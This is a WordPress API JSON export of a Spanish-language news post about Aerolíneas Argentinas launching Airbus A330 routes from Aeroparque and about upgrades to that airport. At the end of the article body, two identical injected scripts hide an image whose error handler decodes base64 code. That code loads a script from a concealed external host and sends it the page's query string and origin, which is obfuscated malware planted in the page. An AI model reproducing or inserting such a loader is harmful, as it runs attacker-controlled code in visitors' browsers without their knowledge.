{"id":2698,"date":"2023-06-07T12:38:04","date_gmt":"2023-06-07T15:38:04","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2698"},"modified":"2025-08-14T00:15:43","modified_gmt":"2025-08-14T03:15:43","slug":"aerolineas-argentinas-confirma-su-operacion-con-airbus-330-desde-aeroparque","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2698","title":{"rendered":"Aerol\u00edneas Argentinas confirma su operaci\u00f3n con Airbus 330 desde Aeroparque"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#096ea9\"><em>Desde el 7 de agosto, la l\u00ednea a\u00e9rea volar\u00e1 con aeronaves Airbus 330 desde Aeroparque a Miami, Nueva York, El Calafate, Iguaz\u00fa y Ushuaia<\/em><\/h3>\n\n\n\n<p>Aerol\u00edneas Argentinas confirm\u00f3 el inicio de sus operaciones con aviones A330 desde Aeroparque.<\/p>\n\n\n\n<p>En el caso de Miami se operar\u00e1 los martes, mi\u00e9rcoles, viernes y domingos con horario de partida a las 23.30. Los regresos ser\u00e1n 3 semanales (martes, mi\u00e9rcoles y domingos) con partida a las 10.05 y arribo a las 20.00.<\/p>\n\n\n\n<p>La ruta con Nueva York contar\u00e1 con 3 vuelos semanales, los lunes, jueves y s\u00e1bados partiendo a las 23.55. Los regresos ser\u00e1n los martes, viernes y domingos con partida desde JFK a las 15.25 y arribo a las 3.25. Este vuelo permitir\u00e1 a los turistas conectar a los principales destinos tur\u00edsticos dentro de la Argentina en el horario pico de salidas diarias y con tiempos de conexi\u00f3n m\u00ednimos.<\/p>\n\n\n\n<p>Adem\u00e1s, ya fueron confirmadas las primeras operaciones con Airbus en domestico: los lunes y mi\u00e9rcoles a las 6.55 cubrir\u00e1n la ruta Aeroparque \u2013 Ushuaia. En tanto que, de momento, son 3 los regresos programados desde Tierra del Fuego: lunes, mi\u00e9rcoles y s\u00e1bados. Tambi\u00e9n, habr\u00e1 una salida hacia Iguaz\u00fa cada s\u00e1bado a las 6.55 y una salida, tambi\u00e9n los s\u00e1bados, desde El Calafate a las 18.30.<\/p>\n\n\n\n<p>\u00abDe esta forma mejoramos nuestros productos, siendo m\u00e1s eficientes con nuestras cuentas, y simult\u00e1neamente, potenciamos nuestro rol al traer m\u00e1s turistas desde los Estados Unidos que pueden conectar con todos los vuelos dom\u00e9sticos de nuestra red y con tiempos de conexi\u00f3n m\u00ednimos\u00bb, explic\u00f3 Pablo Ceriani, presidente de Aerol\u00edneas Argentinas.<\/p>\n\n\n\n<p>Los A330 son los aviones de mayor capacidad que posee Aerol\u00edneas Argentinas e integran su mono-flota de largo alcance. Poseen 24 asientos en clase ejecutiva y 248 en turista. Por su autonom\u00eda, performance y caracter\u00edsticas de vuelo, estas aeronaves cubren principalmente las rutas a Europa, EE. UU., Caribe y destinos dom\u00e9sticos de alta demanda.<\/p>\n\n\n\n<p>Cabe recordar que, la empresa incorpor\u00f3 hace pocas semanas una nueva aeronave de este modelo y que otro m\u00e1s ser\u00e1 incorporado durante el a\u00f1o. De esta manera, la flota de A330 \u2013 200 volver\u00e1 a contar con 10 aviones operativos.<\/p>\n\n\n\n<p>Resulta importante mencionar, adem\u00e1s, que estos aviones se encuentran habilitados para operar en el Aeroparque \u00abJorge Newbery\u00bb gracias al conjunto de obras que fueron inauguradas a finales de 2022 y que incluyen una nueva pista de 2690 metros, es decir, 590 metros m\u00e1s de lo que ten\u00eda hace 4 a\u00f1os.<\/p>\n\n\n\n<p>Esta expansi\u00f3n incluy\u00f3, tambi\u00e9n, el agrandamiento del ancho de la misma que ahora alcanza los 60 metros totales, de acuerdo a los est\u00e1ndares internacionales m\u00e1s exigentes.<\/p>\n\n\n\n<p>Asimismo, se instal\u00f3 un nuevo sistema de balizamiento, que eleva la categor\u00eda del aeropuerto a Nivel III. Esto permite volar con mayores m\u00e1rgenes de seguridad en condiciones meteorol\u00f3gicas adversas y\/o lo que en la industria se denomina \u00aboperaci\u00f3n por instrumentos\u00bb.<\/p>\n\n\n\n<p>Se reconstruy\u00f3 y ampli\u00f3 la terminal de pasajeros internacionales agregando m\u00e1s superficie, m\u00e1s puertas de embarque, nueva tecnolog\u00eda, m\u00e1s posiciones de control aduanero, migratorio y de control a cargo de la Polic\u00eda de Seguridad Aeroportuaria. Asimismo, se ampliaron los servicios con m\u00e1s ofertas gastron\u00f3micas y comercios.<\/p>\n\n\n\n<p>Al momento de iniciar la operaci\u00f3n el 7 de agosto, ya estar\u00e1n listas las nuevas plataformas de posicionamiento de aeronaves, los nuevos accesos vehiculares y se agregar\u00e1n facilidades para los pasajeros en conexi\u00f3n. De igual forma, se realizaron obras en el la terminal de pasajeros, pre-embarque y en distintas zonas p\u00fablicas del aeropuerto.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde el 7 de agosto, la l\u00ednea a\u00e9rea volar\u00e1 con aeronaves Airbus 330 desde Aeroparque a Miami, Nueva York, El Calafate, Iguaz\u00fa y Ushuaia Aerol\u00edneas Argentinas confirm\u00f3 el inicio de sus operaciones con aviones A330 desde Aeroparque. En el caso de Miami se operar\u00e1 los martes, mi\u00e9rcoles, viernes y domingos con horario de partida a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2699,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-2698","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2698"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2698"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2698\/revisions"}],"predecessor-version":[{"id":7067,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2698\/revisions\/7067"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2699"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2698"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2698"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2698"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}